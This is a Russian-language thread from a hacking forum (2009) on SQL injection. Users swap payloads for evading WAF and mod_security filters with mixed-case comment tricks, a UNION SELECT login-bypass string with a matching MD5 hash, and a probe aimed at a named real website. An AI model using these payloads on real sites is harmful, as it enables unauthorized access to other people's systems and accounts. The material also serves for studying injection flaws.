ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.10.2009, 05:44
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами: 9204308

Репутация: 256
По умолчанию

Цитата:
Сообщение от smtgr  
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
В зависимости от конкретной ситуации... дай реальный пример...
 
Ответить с цитированием

  #2  
Старый 09.10.2009, 07:16
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от smtgr  
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
-12/**/ANd/**/1=2/**/uNioN/**/SeLecT/**/1,2,3/*
Попробуй так что ле...
Без пример сложновато
 
Ответить с цитированием

  #3  
Старый 09.10.2009, 15:19
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
С нами: 9521666

Репутация: 1695
По умолчанию

Цитата:
Сообщение от smtgr  
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
Возможно Apache с mod_security, по обходу, попробуй POST'ом послать.
 
Ответить с цитированием

  #4  
Старый 09.10.2009, 15:39
smth
Новичок
Регистрация: 14.09.2009
Сообщений: 8
С нами: 8766793

Репутация: 4
По умолчанию

Цитата:
Сообщение от smtgr  
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
Пробуй вот так
http://site.net/index.php?id=777+union+select+1,2,3/* должно быть корректно, затем подставь -777 и ищи вывод

зачем тебе and+1=2 ?!?!
 
Ответить с цитированием

  #5  
Старый 27.09.2009, 23:09
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию

Цитата:
Сообщение от mailbrush  
Есть бажный сайт, при подставке кавычки в авторизацию пишет
Код:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1

select * from customers where customers_email_address='''

[TEP STOP]
Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже...
mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:
PHP код:
$res mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item mysql_fetch_array($res);
if(
md5($_POST['password']) == $item['password']) {
echo 
"LOGINED"!
} else {
echo 
"FAIL!";

Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.

Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty
__________________
включи голову
 
Ответить с цитированием

  #6  
Старый 27.09.2009, 23:19
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от oRb  
mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:
PHP код:
$res mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item mysql_fetch_array($res);
if(
md5($_POST['password']) == $item['password']) {
echo 
"LOGINED"!
} else {
echo 
"FAIL!";

Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.

Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty
Точно... Просто привык, что все данные берутся из БД, никогда не встречался с такими скриптами, поэтому и не понял
 
Ответить с цитированием

  #7  
Старый 28.09.2009, 17:10
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от oRb  
mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:
PHP код:
$res mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item mysql_fetch_array($res);
if(
md5($_POST['password']) == $item['password']) {
echo 
"LOGINED"!
} else {
echo 
"FAIL!";

Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.

Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty
Как выяснилось, он проверяет еще и мыло. Я зарегался с мылом test@domain.com, паролем password. При вводе
Код:
test@domain.com
password
авторизация успешна, но при вводе
Код:
test@domain.com'#
password
пишет, что пароль неверный.. Значит никак не обойти?
 
Ответить с цитированием

  #8  
Старый 28.09.2009, 17:42
WNZRS
Участник форума
Регистрация: 03.09.2009
Сообщений: 179
С нами: 8782736

Репутация: 90
По умолчанию

Цитата:
Сообщение от mailbrush  
Как выяснилось, он проверяет еще и мыло. Я зарегался с мылом test@domain.com, паролем password. При вводе
Код:
test@domain.com
password
авторизация успешна, но при вводе
Код:
test@domain.com'#
password
пишет, что пароль неверный.. Значит никак не обойти?
там может быть двойные кавычки, ещё можно иньекцию на пароле проверить
 
Ответить с цитированием

  #9  
Старый 28.09.2009, 02:08
Merl00k
Познающий
Регистрация: 06.11.2008
Сообщений: 32
С нами: 9216004

Репутация: 21
По умолчанию

Ребят что это за бага? http://www.sys-tema.ru/index.jsp?pk=' (если вообще бага)
 
Ответить с цитированием

  #10  
Старый 28.09.2009, 02:15
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами: 8947056

Репутация: 229
По умолчанию

Цитата:
Сообщение от Merl00k  
Ребят что это за бага? http://www.sys-tema.ru/index.jsp?pk=' (если вообще бага)
Похоже на LFI

Последний раз редактировалось wolmer; 28.09.2009 в 02:21..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.